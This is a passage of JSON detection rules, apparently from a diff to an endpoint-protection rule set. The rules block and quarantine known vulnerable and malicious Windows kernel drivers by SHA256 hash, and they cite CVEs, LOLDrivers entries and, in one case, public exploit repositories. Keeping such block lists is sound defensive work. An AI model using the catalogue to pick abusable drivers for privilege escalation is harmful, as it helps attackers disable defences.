"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144985Z", + "creation_date": "2026-03-23T11:45:32.144987Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144993Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4143a5bbea0d303c22d6edc6f43463e336eea9144218e02adad72133266130d2", + "comment": "Malicious Kernel Driver (aka driver_d1ea9e16.sys) [https://www.loldrivers.io/drivers/8697785a-d088-42a7-ac25-b5c8a3b22664/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "751f5975-5a61-54ae-a9be-b39784c83c55", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143467Z", + "creation_date": "2026-03-23T11:45:32.143469Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143474Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6278bc785113831b2ec3368e2c9c9e89e8aca49085a59d8d38dac651471d6440", + "comment": "Vulnerable Kernel Driver (aka wsdkd.sys) [https://www.loldrivers.io/drivers/a8f2da2a-369c-4b4d-9a00-d7a892b9f7c3/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75303b7d-b6fe-5e28-bc87-951f180ee16e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, 
+ "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617521Z", + "creation_date": "2026-03-23T11:45:29.617523Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617528Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2952ae305f9e206bb0b6d7986f2b6942656c310f9d201cf2e2dd6e961c18804e", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75474ac6-f4ed-5ea2-a25f-db887733fc9b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472374Z", + "creation_date": "2026-03-23T11:45:30.472377Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472386Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d366cbc1d5dd8863b45776cfb982904abd21d0c0d4697851ff54381055abcfc8", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75485e95-4fc0-5e5e-b29b-f58a4a1e65d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830429Z", + "creation_date": "2026-03-23T11:45:31.830431Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d54f1068df426973293ef4a2600642f1bb355511a81fa7d69526dd6ca88f9c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "754a2f56-6765-5bed-84d8-193cdd9e7f0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148881Z", + "creation_date": "2026-03-23T11:45:31.148883Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148888Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eaffbe1b1d732fac8ea2fd78b6a9272d08c89c90d8be590a1128c20e4f34a010", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "754ac519-0359-5e43-876a-5ce0ba54375d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622140Z", + "creation_date": "2026-03-23T11:45:29.622142Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622147Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d", + "comment": "NamCo vulnerable driver (aka 
smep_namco.sys) [https://securelist.com/elevation-of-privileges-in-namco-driver/83707/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "755cb237-a350-5483-8d46-399d1e7fd91a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610124Z", + "creation_date": "2026-03-23T11:45:29.610126Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610131Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34bee22c18ddbddbe115cf1ab55cabf0e482aba1eb2c343153577fb24b7226d3", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75733e07-93b7-5fb8-bad7-f9037248eb13", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618057Z", + "creation_date": "2026-03-23T11:45:29.618059Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618065Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4737750788c72d2fc9cf95681c622357263075d65b23e54c4dc3f31446cad37b", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "758ec7c1-8ea9-5995-a603-90db92ea0309", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823713Z", + "creation_date": "2026-03-23T11:45:31.823715Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823721Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5483d329abd393f8210f4c2ac1ac869d0460437a3f02d2b12bce5d79efb6094c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75902a3f-6097-5473-bf71-acad317b735e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617731Z", + "creation_date": "2026-03-23T11:45:29.617733Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617739Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71dc8d678e0749599d3db144c93741f64def1b8b0efb98bef963d2215ebb4992", + "comment": "Cheat Engine dangerous driver (aka dbk64.sys) [https://www.loldrivers.io/drivers/1524a54d-520d-4fa4-a7d5-aaaa066fbfc4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "759199e1-0a20-5d1b-abd7-37733a1e1251", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823815Z", + "creation_date": "2026-03-23T11:45:31.823817Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.823822Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2cec449ef0979ac93a7ef6800ee545eea4e06c7fde1e845b6e03a4d876ecbf78", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7595d3f8-78b9-582c-91a1-1589b35bef58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973810Z", + "creation_date": "2026-03-23T11:45:29.973812Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973817Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "818e396595d08d724666803cd29dac566dc7db23bf50e9919d04b33afa988c01", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75a4f09d-428c-5f4d-b71e-7b022902dc11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151782Z", + "creation_date": "2026-03-23T11:45:31.151785Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151795Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91106ec1eca4aa843813fc2f938a6bd8a11479afd0994f84c4adf28e0ad628c5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75af6210-5611-5f5d-8bc1-a25b1116707e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490644Z", + "creation_date": "2026-03-23T11:45:31.490646Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490651Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "2076e52665e419bb4001119a08c5cee2cb8931e534b2fa92a01112866ec0bd5a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75b80154-0ed1-5d7e-8021-f594f6d9a19b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976228Z", + "creation_date": "2026-03-23T11:45:29.976230Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976235Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) 
[https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75c26195-5de6-5df8-b9d0-984ae906647a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820065Z", + "creation_date": "2026-03-23T11:45:30.820067Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820073Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f5243c9d9638a23ccf0e32f54c585e5688a4a853ff04898281fa23697aaec34", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75e09d81-e474-5593-818d-cd943503a42f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975325Z", + "creation_date": "2026-03-23T11:45:29.975327Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975332Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43b82200c2189aa63b332a62907f12fd5ad52fe275feca60fa9636555319518a", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75ed486c-f9d3-5ef8-819a-59d1c697ac4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483662Z", + "creation_date": "2026-03-23T11:45:31.483666Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483675Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5d1e83cb1056ee615c4f03456d55dfc95a76f8afc64116728edd5c44ca7017fa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] 
[file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75f7bce2-29d7-5d6a-9fb2-c55b8969f627", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604090Z", + "creation_date": "2026-03-23T11:45:29.604092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604097Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f742d827a2e203a4c9d8fccb1daf2e85d451761fc9c0acb962dd6c447ef10ca", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75f872d7-7c98-5539-86a9-cadd39823d63", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470990Z", + "creation_date": "2026-03-23T11:45:30.470993Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471002Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "234664ae69df63d55c1477f3adc33ffdb130fc939c55c16e73e3339a133bcfa3", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "75f9d3a5-a896-5556-bff0-36bcdc84fcc7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142939Z", + "creation_date": "2026-03-23T11:45:32.142941Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142947Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2fa50ee8ed9d5c91d3375950613132497c44f468193bce9fe8e51c918a9498b5", + "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "76015575-1679-5cbd-a935-eb28dc554abd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835375Z", + "creation_date": "2026-03-23T11:45:30.835378Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835388Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d86194d55186fa5f976da6cdc8758411d8e3d6a221417ac815aa3ba148e0d90", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "76042022-c1f2-5fbc-8701-7d9c84598809", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982538Z", + "creation_date": "2026-03-23T11:45:29.982540Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982545Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "5bc3994612624da168750455b363f2964e1861dba4f1c305df01b970ac02a7ae", + "comment": "Malicious Kernel Driver (aka daxin_blank1.sys) [https://www.loldrivers.io/drivers/1bf3b155-752a-4cc7-beb0-f202e525eb1a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "760a10b5-d13e-5837-8a1c-2b670477440c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983439Z", + "creation_date": "2026-03-23T11:45:29.983441Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983446Z", + 